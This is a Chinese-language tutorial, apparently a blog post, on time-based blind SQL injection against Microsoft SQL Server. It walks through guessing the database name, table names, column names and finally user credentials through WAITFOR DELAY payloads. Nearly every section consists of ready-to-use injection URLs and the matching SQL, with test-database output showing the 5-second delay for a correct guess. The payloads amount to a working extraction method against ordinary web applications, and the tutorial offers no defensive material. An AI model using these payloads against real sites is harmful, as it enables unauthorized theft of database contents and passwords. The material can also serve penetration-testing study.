0x01 前言
SQL Server 的延时注入比较离谱,延时代码必须放到 SQL语句的最后面
这就导致了,注入点必须可以闭合代码,并且使用 — 注释掉后面的无用代码
如果没有办法保证 waitfor delay ‘0:0:5’ 在 SQL的最后面,那么本方法就无法使用
0x02 测试数据
1> select * from article;2> go+----+-----------+-----------+| id | title | content |+----+-----------+-----------+| 1 | 测试标题 | 测试内容 || 2 | 测试标题2 | 测试内容2 |+----+-----------+-----------+(2 rows affected)
# 测试表数据: users;sql server> select * from users;+----+--------------+----------+| id | username | password |+----+--------------+----------+| 1 | test-user-01 | 123456 || 2 | test-user-02 | 234567 |+----+--------------+----------+2 rows in set (0.00 sec)
sql server> SELECT system_user;+-----------------------+| field1 |+-----------------------+| sa |+-----------------------+1 row in set (0.00 sec)
sql server> select db_name();+-----------------------+| field1 |+-----------------------+| test |+-----------------------+1 row in set (0.00 sec)
0x03 猜库名
注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name() 就是当前连接的数据库
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库
web语句: http://www.test.com/sql.php?id=1‘ IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a
数据库语句: select * from article WHERE id=’1’ IF(db_name() like ‘%test%’) waitfor delay ‘0:0:5’ — a’;
# 获取 当前连接的数据库 数据# 对得情况1> SELECT*FROMarticleWHEREid = '1'IF (db_name() LIKE '%test%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (5.064 sec)# 错误的情况1> SELECT*FROMarticleWHEREid = '1'IF (db_name() LIKE '%aaaa%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (0.04 sec)
0x04 猜表名
注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段
查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’
查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1‘ IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like ‘%article%’) waitfor delay ‘0:0:5’ — a
数据库语句: select * from article WHERE id=’1’ IF((select table_name from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1) like ‘%article%’) waitfor delay ‘0:0:5’ — a’;
# 获取 当前库 1表数据# 对的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTtable_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY table_name) AS row_number,table_nameFROMinformation_schema.tablesWHEREtable_catalog = db_name()) AS aWHERErow_number = 1) LIKE '%article%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (5.03 sec)# 错误的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTtable_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY table_name) AS row_number,table_nameFROMinformation_schema.tablesWHEREtable_catalog = db_name()) AS aWHERErow_number = 1) LIKE '%bbbb%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (0.05 sec)
# 获取 当前库 2表数据# 对的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTtable_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY table_name) AS row_number,table_nameFROMinformation_schema.tablesWHEREtable_catalog = db_name()) AS aWHERErow_number = 2) LIKE '%users%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (5.05 sec)# 错误的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTtable_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY table_name) AS row_number,table_nameFROMinformation_schema.tablesWHEREtable_catalog = db_name()) AS aWHERErow_number = 2) LIKE '%aaaaaaa%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (0.03 sec)
0x05 猜字段
注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段
查询不同的表可以这样
例如:
table_name=’要查询的表名’
查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1‘ IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1) like ‘%id%’) waitfor delay ‘0:0:5’ — a
数据库语句: select * from article WHERE id=’1’ IF((select column_name from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1) like ‘%id%’) waitfor delay ‘0:0:5’ — a’;
# 当前库 users表 字段数据列表1> SELECT*FROM(SELECTROW_NUMBER () OVER (ORDER BY column_name) AS row_number,column_nameFROMinformation_schema.columnsWHEREtable_catalog = db_name()AND table_name = 'users') AS a;2> go+-------------+-------------+| row_number | column_name |+-------------+-------------+| 1 | id || 2 | password || 3 | username |+-------------+-------------+(3 rows affected)
# 获取当前库 users表 第一个字段数据# 对的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTcolumn_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY column_name) AS row_number,column_nameFROMinformation_schema.columnsWHEREtable_catalog = db_name()AND table_name = 'users') AS aWHERErow_number = 1) LIKE '%id%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (5.077 sec)# 错误的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTcolumn_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY column_name) AS row_number,column_nameFROMinformation_schema.columnsWHEREtable_catalog = db_name()AND table_name = 'users') AS aWHERErow_number = 1) LIKE '%aaaaaaaaa%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+---------5+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (0.003 sec)
# 获取当前库 users表 第二个字段数据# 对的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTcolumn_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY column_name) AS row_number,column_nameFROMinformation_schema.columnsWHEREtable_catalog = db_name()AND table_name = 'users') AS aWHERErow_number = 2) LIKE '%password%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (5.05 sec)# 错误的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTcolumn_nameFROM(SELECTROW_NUMBER () OVER (ORDER BY column_name) AS row_number,column_nameFROMinformation_schema.columnsWHEREtable_catalog = db_name()AND table_name = 'users') AS aWHERErow_number = 2) LIKE '%savasv%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (0.03 sec)
0x06 猜内容
注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段
获取不同得字段数据可以修改 web语句里面得 a.username
例如
user表字段数据为:id, username,password
因为我使用了别名,所以如果想要获取其他得数据可以改成
a.id,a.username,a.password
查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2
web语句: http://www.test.com/sql.php?id=1‘ IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1) like ‘%test-user-01%’) waitfor delay ‘0:0:5’ — a
数据库语句: select from article WHERE id=’1’ IF((select a.username from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1) like ‘%test-user-01%’) waitfor delay ‘0:0:5’ — a’;
# 查询users表 第一条数据, username 字段数据# 对的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTa.usernameFROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 1) LIKE '%test-user-01%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (5.07 sec)# 错误的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTa.usernameFROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 1) LIKE '%aaaaaa%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (0.07 sec)
# 查询users表 第二条数据, password 字段数据# 对的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTa.passwordFROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 2) LIKE '%234567%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (5.06 sec)# 错误的情况1> SELECT*FROMarticleWHEREid = '1'IF ((SELECTa.passwordFROM(SELECTROW_NUMBER () OVER (ORDER BY username) AS row_number ,*FROMusers) AS aWHERErow_number = 2) LIKE '%aascacascsac%') WAITFOR delay '0:0:5' -- a';2> go+----+----------+----------+| id | title | content |+----+----------+----------+| 1 | 测试标题 | 测试内容 |+----+----------+----------+(1 rows affected) (0.06 sec)
若有收获,就点个赞吧
0 人点赞
